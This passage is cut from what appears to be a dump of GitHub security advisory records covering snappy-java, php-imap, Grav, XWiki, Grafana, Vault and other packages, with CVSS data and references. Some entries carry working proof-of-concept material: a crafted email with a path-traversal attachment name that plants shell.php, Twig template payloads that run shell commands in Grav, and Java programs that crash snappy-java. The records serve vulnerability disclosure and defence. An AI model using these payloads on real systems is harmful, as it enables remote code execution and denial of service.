[Snappy.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/Snappy.java) receives an array of characters and compresses it. It does so by multiplying the length by 2 and passing it to the [rawCompress](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L422) function. ```java public static byte[] compress(char[] input) throws IOException { return rawCompress(input, input.length * 2); // char uses 2 bytes } ``` Since the length is not tested, the multiplication by two can cause an integer overflow and become negative. The rawCompress function then uses the received length and passes it to the natively compiled maxCompressedLength function, using the returned value to allocate a byte array. ```java public static byte[] rawCompress(Object data, int byteSize) throws IOException { byte[] buf = new byte[Snappy.maxCompressedLength(byteSize)]; int compressedByteSize = impl.rawCompress(data, 0, byteSize, buf, 0); byte[] result = new byte[compressedByteSize]; System.arraycopy(buf, 0, result, 0, compressedByteSize); return result; } ``` Since the maxCompressedLength function treats the length as an unsigned integer, it doesn’t care that it is negative, and it returns a valid value, which is casted to a signed integer by the Java engine. If the result is negative, a “java.lang.NegativeArraySizeException” exception will be raised while trying to allocate the array “buf”. On the other side, if the result is positive, the “buf” array will successfully be allocated, but its size might be too small to use for the compression, causing a fatal Access Violation error. The same issue exists also when using the “compress” functions that receive double, float, int, long and short, each using a different multiplier that may cause the same issue. The issue most likely won’t occur when using a byte array, since creating a byte array of size 0x80000000 (or any other negative value) is impossible in the first place. ## Steps To Reproduce Compile and run the following code: ```java package org.example; import org.xerial.snappy.Snappy; import java.io.*; public class Main { public static void main(String[] args) throws IOException { char[] uncompressed = new char[0x40000000]; byte[] compressed = Snappy.compress(uncompressed); } } ``` The program will crash, creating crashdumps and showing the following error (or similar): ``` # # A fatal error has been detected by the Java Runtime Environment: # # EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x0000000063a01c20, pid=21164, tid=508 # ....... ``` Alternatively - compile and run the following code: ```java package org.example; import org.xerial.snappy.Snappy; import java.io.*; public class Main { public static void main(String[] args) throws IOException { char[] uncompressed = new char[0x3fffffff]; byte[] compressed = Snappy.compress(uncompressed); } } ``` The program will crash with the following error (or similar), since the maxCompressedLength returns a value that is interpreted as negative by java: ``` Exception in thread ""main"" java.lang.NegativeArraySizeException: -1789569677 at org.xerial.snappy.Snappy.rawCompress(Snappy.java:425) at org.xerial.snappy.Snappy.compress(Snappy.java:172) at org.example.Main.main(Main.java:10) ```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xerial.snappy:snappy-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.10.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.10.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/security/advisories/GHSA-fjpj-2g6w-x25r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34454'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/commit/d0042551e4a3509a725038eb9b2ad1f683674d94'}, {'type': 'PACKAGE', 'url': 'https://github.com/xerial/snappy-java'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L169'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/Snappy.java#L422'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/Snappy.java'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-15T16:28:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-47p7-xfcc-4pv9,2023-06-21T21:58:58Z,2023-06-21T21:58:58Z,,['CVE-2023-35169'],php-imap vulnerable to RCE through a directory traversal vulnerability,"### Summary An unsanitized attachment filename allows any unauthenticated user to leverage a directory traversal vulnerability which results in a remote code execution vulnerability. ### Details An attacker can send an email with a malicious attachment to the inbox, which gets crawled with webklex/php-imap or webklex/laravel-imap. Prerequisite for the vulnerability is that the script stores the attachments without providing a `$filename`, or providing an unsanitized `$filename`, in `src/Attachment::save(string $path, string $filename = null)` (https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L251-L255). In this case, where no `$filename` gets passed into the `Attachment::save()` method, the package would use a series of unsanitized and insecure input values from the mail as fallback (https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L252). Even if a developer passes a `$filename` into the `Attachment::save()` method, e.g. by passing the name or filename of the mail attachment itself (from email headers), the input values never get sanitized by the package. There is also no restriction about the file extension (e.g. "".php"") or the contents of a file. This allows an attacker to upload malicious code of any type and content at any location where the underlying user has write permissions. The attacker can also overwrite existing files and inject malicious code into files that, e.g. get executed by the system via cron, requests,... The official documentation only shows examples of `Attachment::save()` without providing the `$filename` (https://www.php-imap.com/api/attachment), which makes this vulnerability even more widespread. ### PoC 1. send an email with a malicious attachment to an inbox, which gets crawled by the package ``` Return-Path: Date: Fri, 17 Aug 2018 14:36:24 +0000 From: Attacker To: Victim MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=""_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_"" Mail with malicious attachment --_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_ Content-Type: application/octet-stream; name=shell.php Content-Transfer-Encoding: 8bit Content-Disposition: attachment; filename=../../../../../../../../../../../../var/www/shell.php --_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_-- ``` 3. crawl email with malicious attachment 4. store the attachment with `Attachment::save('/path/to/storage')` without providing a `$filename` value ### Impact This is a remote code execution vulnerability that is made possible through a directory traversal vulnerability. Every application that stores attachments with `Attachment::save()` without providing a `$filename` or passing unsanitized user input is affected by this attack. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'webklex/php-imap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'webklex/laravel-imap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Webklex/php-imap/security/advisories/GHSA-47p7-xfcc-4pv9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35169'}, {'type': 'WEB', 'url': 'https://github.com/Webklex/php-imap/pull/414'}, {'type': 'PACKAGE', 'url': 'https://github.com/Webklex/php-imap'}, {'type': 'WEB', 'url': 'https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L251-L255'}, {'type': 'WEB', 'url': 'https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L252'}, {'type': 'WEB', 'url': 'https://github.com/Webklex/php-imap/releases/tag/5.3.0'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T21:58:58Z', 'nvd_published_at': None}" 1.4.0,GHSA-fj64-qprx-q7vq,2023-06-23T19:39:24Z,2023-06-14T15:30:38Z,,['CVE-2023-34617'],genson vulnerable to stack exhaustion,An issue was discovered genson through 1.6 allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.owlike:genson'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34617'}, {'type': 'WEB', 'url': 'https://github.com/owlike/genson/issues/191'}, {'type': 'PACKAGE', 'url': 'https://github.com/owlike/genson'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:44:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-wm7r-3qxj-5xgq,2023-06-09T22:54:42Z,2023-06-06T21:30:18Z,2023-06-09T22:54:42Z,[],Duplicate Advisory: Grafana Improper Access Control vulnerability,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-cvm3-pp2j-chr3. This link is maintained to preserve external references. ## Original Description Grafana is an open-source platform for monitoring and observability. The option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function. This might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server. Users may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.26'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.19'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.0'}, {'fixed': '9.3.15'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.0'}, {'fixed': '9.4.12'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.5.0'}, {'fixed': '9.5.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2183'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://grafana.com/security/security-advisories/cve-2023-2183/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230706-0002/'}]","{'cwe_ids': ['CWE-284', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-07T15:08:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-gqr4-cvf4-3957,2023-06-27T21:59:25Z,2023-06-20T15:31:08Z,,['CVE-2020-21246'],YiiCMS Cross Site Scripting vulnerability,Cross Site Scripting vulnerability in YiiCMS v.1.2.0 and prior allows a remote attacker to execute arbitrary code via the news function. A fix is available at commit 4a9d68564eb78d9f64e3f5dd77186a154093615b.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sheng/yiicms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-21246'}, {'type': 'WEB', 'url': 'https://github.com/yongshengli/yiicms/issues/6'}, {'type': 'WEB', 'url': 'https://github.com/yongshengli/yiicms/commit/4a9d68564eb78d9f64e3f5dd77186a154093615b'}, {'type': 'PACKAGE', 'url': 'https://github.com/yongshengli/yiicms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:09:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-qfc5-6r3j-jj22,2023-07-05T19:52:13Z,2023-06-02T17:11:58Z,,[],Go package github.com/cosmos/cosmos-sdk module x/crisis does NOT cause chain halt,"# x/crisis does NOT cause chain halt ### Impact If an invariant check fails on a Cosmos SDK network and a transaction is sent to the `x/crisis` module to halt the chain, the chain does not halt. All versions of the `x/crisis` module is affected on all versions of the Cosmos SDK. ### Details The `x/crisis` module is supposed to allow anyone to halt a chain in the event of a violated invariant by sending a `MsgVerifyInvariant` with the name of the invariant. Processing this message is supposed to cause the nodes to panic. However, because the panic is within a transaction, it is caught by the SDK’s built-in panic-recovery machinery and just treated as a normal “invalid” transaction (ie. it returns a non-zero abci Code). Thus the `x/crisis` transactions don’t actually cause chains to halt. If there is an invariant violation, it can be confirmed with an `x/crisis` transaction, but it won’t cause any nodes to halt, they will just continue processing blocks. That said, any node running with `start --inv-check-period X` will actually panic when it runs the periodic check (though it will still not panic just by processing an `x/crisis` transaction). Since this panic is located in EndBlock, it is not caught by the panic-recovery machinery and does actually crash the node. Presumably few if any nodes actually run with this in production because of how long the invariant checks take, and this runs all of them every `X` blocks. ### Patches No patches will be released. The `x/crisis` module was originally intended to allow chains to halt rather than continue with some unknown behaviour in the case of an invariant violation (safety over liveness). However, as chains mature, and especially as the potential [cost of halting increases](https://github.com/osmosis-labs/osmosis/issues/570), chains should consider carefully what invariants they really want to halt for, and what invariants are just sort of helpful sanity checks, but may not be worth halting for. In some cases, chains have already broken the invariant calculations but have dealt with the consequences off-chain or during development. Halting these chains would be counter-productive. The SDK team is working on new modules that allow chain developers to fine-tune the chain invariants and the necessary actions. Hence, the decision was made that the `x/crisis` module will not be patched for chain halts. The module will be deprecated when new modules take over its responsibilities. ### Workarounds In case of a valid invariant check failure that requires a chain halt, the network validators are encouraged to coordinate off-chain for network halts. This has been an already established process for security patches. ### References SDK developer epic about invariant checking: https://github.com/cosmos/cosmos-sdk/issues/15706 Public report: https://github.com/cosmos/cosmos-sdk/issues/15325",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/cosmos/cosmos-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.47.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/security/advisories/GHSA-qfc5-6r3j-jj22'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/issues/15325'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/issues/15706'}, {'type': 'PACKAGE', 'url': 'https://github.com/cosmos/cosmos-sdk'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-02T17:11:58Z', 'nvd_published_at': None}" 1.4.0,GHSA-phwm-87rg-27qq,2023-06-22T19:59:25Z,2023-06-22T19:59:25Z,,['CVE-2023-35157'],XWiki Platform vulnerable to reflected cross-site scripting via delattachment action,"### Impact It's possible to perform an XSS by forging a request to a delete attachment action with a specific attachment name. Now this XSS can be exploited only if the attacker knows the CSRF token of the user, or if the user ignores the warning about the missing CSRF token. ### Patches The vulnerability has been patched in XWiki 15.1-rc-1 and XWiki 14.10.6. ### Workarounds There's no workaround for this other than upgrading XWiki. ### References * Jira ticket: https://jira.xwiki.org/browse/XWIKI-20339 * Commit containing the fix: https://github.com/xwiki/xwiki-platform/commit/35e9073ffec567861e0abeea072bd97921a3decf ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2-milestone-3'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-0'}, {'fixed': '15.1-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-phwm-87rg-27qq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35157'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/35e9073ffec567861e0abeea072bd97921a3decf'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20339'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T19:59:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-whr7-m3f8-mpm8,2023-06-16T19:37:08Z,2023-06-16T19:37:08Z,,['CVE-2023-34448'],Grav Server-side Template Injection (SSTI) via Twig Default Filters,"Hi, actually we have sent the bug report to [security@getgrav.org](mailto:security@getgrav.org) on 27th March 2023 and on 10th April 2023. # Grav Server-side Template Injection (SSTI) via Twig Default Filters ## Summary: | **Product** | Grav CMS | | ----------------------- | --------------------------------------------- | | **Vendor** | Grav | | **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution | | **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) | | **Tested Versions** | v1.7.40 | | **Internal Identifier** | STAR-2023-0008 | | **CVE Identifier** | TBD | | **CWE(s)** | CWE-184: Incomplete List of Disallowed Inputs, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine | ## CVSS3.1 Scoring System: **Base Score:** 7.2 (High) **Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` | **Metric** | **Value** | | ---------------------------- | --------- | | **Attack Vector (AV)** | Network | | **Attack Complexity (AC)** | Low | | **Privileges Required (PR)** | High | | **User Interaction (UI)** | None | | **Scope (S)** | Unchanged | | **Confidentiality \(C)** | High | | **Integrity (I)** | High | | **Availability (A)** | High | ## Product Overview: Grav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin. ## Vulnerability Summary: The patch for [CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/), a server-side template injection vulnerability in Grav leveraging the default `filter()` function, did not block other built-in functions exposed by Twig's Core Extension that could be used to invoke arbitrary unsafe functions, thereby allowing for remote code execution. ## Vulnerability Details: Twig comes with an extension known as the [Core Extension](https://github.com/twigphp/Twig/blob/v1.44.7/src/Extension/CoreExtension.php) that is enabled by default when initialising a new [Twig environment](https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148). Twig's Core Extension provides multiple built-in filters, such as the `filter()` function, which can be used in Twig templates. [CVE-2022-2073](https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/) leverages the default `filter()` filter function in Twig to invoke arbitrary unsafe functions. This was patched by overriding the default `filter()` filter function in commit [9d6a2d](https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83) of Grav v1.7.34 to perform validation checks on the arguments passed to `filter()`: ~~~diff php ... class GravExtension extends AbstractExtension implements GlobalsInterface { ... public function getFilters(): array { return [ ... // Security fix + new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]), ]; } ... + /** + * @param Environment $env + * @param array $array + * @param callable|string $arrow + * @return array|CallbackFilterIterator + * @throws RuntimeError + */ + function filterFilter(Environment $env, $array, $arrow) + { + if (is_string($arrow) && Utils::isDangerousFunction($arrow)) { + throw new RuntimeError('Twig |filter(""' . $arrow . '"") is not allowed.'); + } + + return \twig_array_filter($env, $array, $arrow); + } } ~~~ However, looking at the source code of [/src/Extension/CoreExtension.php](https://github.com/twigphp/Twig/blob/v1.44.7/src/Extension/CoreExtension.php) of Twig, alternative default Twig filters could also be used invoke arbitrary functions: ~~~php ... class CoreExtension extends AbstractExtension { ... public function getFilters(): array { return [ ... // array helpers ... new TwigFilter('filter', 'twig_array_filter', ['needs_environment' => true]), // unsafe new TwigFilter('map', 'twig_array_map', ['needs_environment' => true]), // unsafe new TwigFilter('reduce', 'twig_array_reduce', ['needs_environment' => true]), // unsafe ]; } ~~~ The three filter functions above respectively call `array_filter()`, `array_map()` and `array_reduce()`. Since only `filter()` is being overriden by Grav to ensure that the callable passed to `filter()` does not result in the invocation of an unsafe function, the other two functions (i.e. `map()` and `reduce()`) could be used by an authenticated attacker that is able to inject and render malicious templates to gain remote code execution. ## Exploit Conditions: This vulnerability can be exploited if the attacker has access to: 1. an administrator account, or 2. a non-administrator, user account that are granted the following permissions: - login access to Grav admin panel, and - page creation or update rights ## Reproduction Steps: 1. Log in to Grav Admin using an administrator account. 2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user: * Login to Admin - Allowed * Page Update - Allowed 2. Log out of Grav Admin, and log back in using the account created in step 2. 3. Navigate to `http:///admin/pages/home`. 4. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage. 5. Under the `Content` tab, insert the following payload within the editor: ~~~twig {{ ['id'] | map('system') }} {{ ['id'] | reduce('system') }} ~~~ 4. Click the Preview button. Observe that the output of the `id` shell command is returned in the preview. ## Suggested Mitigations: Override the built-in Twig `map()` and `reduce()` filter functions in `system/src/Grav/Common/Twig/Extension/GravExtension.php` to validate the argument passed to the filter in `$arrow`. For example: ~~~diff ... class GravExtension extends AbstractExtension implements GlobalsInterface { ... public function getFilters(): array { return [ ... // Security fix new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]), + new TwigFilter('map', [$this, 'mapFilter'], ['needs_environment' => true]), + new TwigFilter('reduce', [$this, 'reduceFilter'], ['needs_environment' => true]), ]; } ... + /** + * @param Environment $env + * @param array $array + * @param callable|string $arrow + * @return array|CallbackFilterIterator + * @throws RuntimeError + */ + function mapFilter(Environment $env, $array, $arrow) + { + if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) { + throw new RuntimeError('Twig |map(""' . $arrow . '"") is not allowed.'); + } + + return \twig_array_map($env, $array, $arrow); + } + + /** + * @param Environment $env + * @param array $array + * @param callable|string $arrow + * @return array|CallbackFilterIterator + * @throws RuntimeError + */ + function reduceFilter(Environment $env, $array, $arrow) + { + if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) { + throw new RuntimeError('Twig |reduce(""' . $arrow . '"") is not allowed.'); + } + + return \twig_array_reduce($env, $array, $arrow); + } } ~~~ ## Detection Guidance: The following strategies may be used to detect potential exploitation attempts. 1. Searching within Markdown pages using the following shell command: `grep -Priz -e '\|\s*(map|reduce)\s*\(' /path/to/webroot/user/pages/` 2. Searching within Doctrine cache data using the following shell command: `grep -Priz -e '\|\s*(map|reduce)\s*\(' --include '*.doctrinecache.data' /path/to/webroot/cache/` 3. Searching within Twig cache using the following shell command: `grep -Priz -e 'twig_array_(map|reduce)' /path/to/webroot/cache/twig/` 4. Searching within compiled Twig template files using the following shell command: `grep -Priz -e '\|\s*(map|reduce)\s*\(' /path/to/webroot/cache/compiled/files/` Note that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts. ## Credits: Ngo Wei Lin ([@Creastery](https://twitter.com/Creastery)) & Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg)) ## Vulnerability Disclosure: This vulnerability report is subject to a 120 day disclosure deadline as per [STAR Labs SG Pte. Ltd.'s Vulnerability Disclosure Policy](https://starlabs.sg/advisories/STAR%20Labs%20SG%20Pte.%20Ltd.%20Vulnerability%20Disclosure%20Policy.pdf). After 120 days have elapsed, the vulnerability report will be published to the public by [STAR Labs SG Pte. Ltd.](https://starlabs.sg/) (STAR Labs). The scheduled disclosure date is _**25th July, 2023**_. Disclosure at an earlier date is also possible if agreed upon by all parties. Kindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report: 1. **CVE-2023-30596** Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `GravExtension.filterFilter()` and to achieve remote code execution via Twig's default filters `map()` and `reduce()`. This is a bypass of CVE-2022-2073. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.42'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/getgrav/grav/security/advisories/GHSA-whr7-m3f8-mpm8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34448'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5'}, {'type': 'PACKAGE', 'url': 'https://github.com/getgrav/grav'}, {'type': 'WEB', 'url': 'https://github.com/twigphp/Twig/blob/v1.44.7/src/Environment.php#L148'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/'}, {'type': 'WEB', 'url': 'https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83'}]","{'cwe_ids': ['CWE-1336', 'CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:37:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-q57w-826p-46jr,2023-07-06T16:02:12Z,2023-06-27T12:30:42Z,,['CVE-2023-35798'],"Apache Airflow ODBC Provider, Apache Airflow MSSQL Provider Improper Input Validation vulnerability","Input Validation vulnerability in Apache Software Foundation Apache Airflow ODBC Provider, Apache Software Foundation Apache Airflow MSSQL Provider.This vulnerability is considered low since it requires DAG code to use `get_sqlalchemy_connection` and someone with access to connection resources specifically updating the connection to exploit it. This issue affects Apache Airflow ODBC Provider: before 4.0.0; Apache Airflow MSSQL Provider: before 3.4.1. It is recommended to upgrade to a version that is not affected ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-odbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-microsoft-mssql'}, 'ecosystem_specific': {'affected_functions': ['airflow.providers.microsoft.mssql.hooks.mssql.MsSqlHook.get_sqlalchemy_connection']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35798'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/31984'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/b6836986846058e9e5fa271fb7b22ae721020787'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/951rb9m7wwox5p30tdvcfjxq8j1mp4pj'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:26:33Z', 'nvd_published_at': None}" 1.4.0,GHSA-gq98-53rq-qr5h,2023-06-09T22:40:33Z,2023-06-09T18:30:34Z,,['CVE-2023-2121'],Hashicorp Vault vulnerable to Cross-site Scripting,"Vault and Vault Enterprise's (Vault) key-value v2 (kv-v2) diff viewer allowed HTML injection into the Vault web UI through key values. This vulnerability, CVE-2023-2121, is fixed in Vault 1.14.0, 1.13.3, 1.12.7, and 1.11.11.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.7'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.3'}]}]}]","[{'type': 